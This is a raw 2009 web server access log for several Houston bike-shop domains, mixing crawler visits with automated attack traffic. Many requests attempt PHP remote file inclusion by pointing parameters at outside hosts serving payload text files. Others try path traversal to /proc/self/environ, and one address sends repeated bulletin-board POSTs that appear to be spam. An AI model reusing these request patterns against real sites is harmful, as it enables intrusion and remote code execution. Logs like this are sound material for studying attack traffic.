76.1.65.88 - - [12/Jul/2009:17:40:33 -0700] "GET / HTTP/1.1" 200 1764 "http://www.houstonbikeshop.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)" "www.houstonbikeshop.com"
76.1.65.88 - - [12/Jul/2009:17:40:35 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.houstonbikeshop.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)" "www.houstonbikeshop.com"
65.55.106.236 - - [12/Jul/2009:17:46:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
89.234.63.107 - - [12/Jul/2009:17:46:30 -0700] "GET /logs/access.log%20%20//login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:46:30 -0700] "GET /logs//login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:46:30 -0700] "GET /login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:47:44 -0700] "GET /login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:47:44 -0700] "GET /logs/access.log%20%20//login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:47:44 -0700] "GET /logs//login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.245.138.143 - - [12/Jul/2009:17:51:22 -0700] "GET /logs/access.log%20%20//login.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.245.138.143 - - [12/Jul/2009:17:51:22 -0700] "GET /login.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.245.138.143 - - [12/Jul/2009:17:51:23 -0700] "GET /logs//login.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
89.234.63.107 - - [12/Jul/2009:17:52:33 -0700] "GET /logs/access.log//login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:18:20:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:18:28:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.108.194 - - [12/Jul/2009:18:28:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.108.194 - - [12/Jul/2009:18:28:32 -0700] "GET /logs/?N=A HTTP/1.1" 200 2368 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:18:34:08 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
201.217.51.191 - - [12/Jul/2009:18:36:14 -0700] "GET /send_reminders.php?includedir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.217.51.191 - - [12/Jul/2009:18:36:14 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.217.51.191 - - [12/Jul/2009:18:36:14 -0700] "GET /logs/send_reminders.php?includedir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.85.53 - - [12/Jul/2009:18:44:42 -0700] "GET / HTTP/1.0" 200 1748 "SVBIKES.COM/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "svbikes.com"
201.217.51.191 - - [12/Jul/2009:18:46:41 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.92.229.39 - - [12/Jul/2009:18:46:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /appserv/main.php?appserv_root=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs/access.log/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [12/Jul/2009:18:50:30 -0700] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:18:58:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:18:58:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
119.63.198.11 - - [12/Jul/2009:19:05:15 -0700] "GET /bullitinboard/viewtopic.php?p=6012 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
119.63.198.30 - - [12/Jul/2009:19:05:33 -0700] "GET /bullitinboard/viewtopic.php?p=15403 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:19:06:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
67.15.48.60 - - [12/Jul/2009:19:06:40 -0700] "GET /logs/?noSet=0&includedir=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.15.48.60 - - [12/Jul/2009:19:06:40 -0700] "GET /logs/access_081010.log/?noSet=0&includedir=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.15.48.60 - - [12/Jul/2009:19:06:40 -0700] "GET /?noSet=0&includedir=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.15.48.60 - - [12/Jul/2009:19:06:53 -0700] "GET /logs/access.log/?noSet=0&includedir=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:19:07:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:19:15:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:19:17:50 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
201.167.22.223 - - [12/Jul/2009:19:27:18 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
201.167.22.223 - - [12/Jul/2009:19:27:19 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:19:28:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
81.19.66.38 - - [12/Jul/2009:19:28:44 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:19:28:45 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:19:28:46 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:19:28:47 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:19:28:47 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
86.35.0.115 - - [12/Jul/2009:19:33:30 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:19:36:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
210.205.57.2 - - [12/Jul/2009:19:42:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:42:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:42:25 -0700] "GET /skin/zero_vote/error.php?dir=http://mj.sc.kr/member/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:19:42:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:42:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:42:54 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:42:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:04 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:50:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:50:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.230.35.175 - - [12/Jul/2009:19:54:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
87.230.35.175 - - [12/Jul/2009:19:54:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
87.230.35.175 - - [12/Jul/2009:19:54:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:19:55:19 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:56:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:56:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.87.64.234 - - [12/Jul/2009:19:56:40 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.13 - - [12/Jul/2009:19:56:58 -0700] "GET /bullitinboard/viewtopic.php?p=5049 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
211.236.242.164 - - [12/Jul/2009:19:58:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:58:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:58:20 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:58:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:58:31 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:58:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:59:20 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:59:20 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:19:59:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:59:57 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:59:57 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:19:59:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.211.73 - - [12/Jul/2009:20:18:54 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
210.205.57.2 - - [12/Jul/2009:20:49:51 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://mj.sc.kr/member/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.205.57.2 - - [12/Jul/2009:20:49:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mj.sc.kr/member/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
119.63.198.49 - - [12/Jul/2009:21:07:57 -0700] "GET /bullitinboard/viewtopic.php?p=15551 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:21:16:56 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
65.55.211.65 - - [12/Jul/2009:21:21:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.65 - - [12/Jul/2009:21:21:18 -0700] "GET /translations/?S=D HTTP/1.1" 200 3847 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
72.30.79.62 - - [12/Jul/2009:21:22:24 -0700] "GET /?S=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:21:24:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:21:30:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
69.59.21.101 - - [12/Jul/2009:21:37:29 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "houstonbikeshop.com"
69.59.21.101 - - [12/Jul/2009:21:37:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "houstonbikeshop.com"
69.59.21.101 - - [12/Jul/2009:21:37:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "houstonbikeshop.com"
69.163.139.56 - - [12/Jul/2009:21:38:02 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
69.163.139.56 - - [12/Jul/2009:21:38:02 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
69.163.139.56 - - [12/Jul/2009:21:38:02 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
87.230.9.68 - - [12/Jul/2009:21:39:51 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "houstonbikeshop.com"
87.230.9.68 - - [12/Jul/2009:21:39:51 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "houstonbikeshop.com"
